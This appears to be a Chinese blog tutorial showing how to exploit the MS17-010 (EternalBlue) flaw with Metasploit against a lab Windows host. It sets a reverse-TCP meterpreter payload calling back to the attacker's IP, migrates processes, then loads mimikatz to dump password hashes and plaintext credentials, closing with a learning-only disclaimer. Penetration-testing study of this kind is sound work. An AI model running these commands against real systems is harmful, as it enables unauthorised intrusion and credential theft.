详解利用ms17-010配合mimikatz获取目标主机账户密码

第一步:使用Nmap扫描目标主机开放端口
要知道ms17010是对445端口进行攻击的,所以我们要先对目标机进行端口扫描

nmap 192.168.48.110

第二步:获取权限

在这里我们利用ms17010(永恒之蓝)漏洞来获取靶机的权限。
运行msf,使用ms17010漏洞。

msf5 > use exploit/windows/smb/ms17_010_eternalblue 



接下来show options查看需要配置的参数

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 


剩下的就是需要我们设置LHOST、RHOST、payload,分别是攻击机IP、靶机IP、攻击载荷。

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.48.1  //攻击机ip
lhost => 192.168.48.1
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.48.110  //靶机ip
rhost => 192.168.48.110
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //攻击载荷
payload => windows/x64/meterpreter/reverse_tcp


一切配置完毕后开始攻击

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

这里可以看到我们已经攻击成功了,拿到了靶机的shell。

拿到权限后先不要着急干别的,这里我们最好先进行进程迁移,确保我们的msf程序在目标机上不会受到干扰

先使用ps命令查看进程

meterpreter > ps


因为我们是64位操作系统,所以我们选择迁移到64位的进程上。

meterpreter > migrate 516  //这里的516是PID,就是进程ID

第三步:使用mimikatz模块获取目标机明文密码

使用mimikatz模块

meterpreter > load mimikatz

获取靶机密码哈希

meterpreter > msv


获取靶机明文密码

meterpreter > kerberos 


到这里攻击就结束了,成功拿到了目标机的明文账户密码。

注:本文仅供参考学习,请勿在网上搞破坏,触犯法律者应承担相应的法律责任!
 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值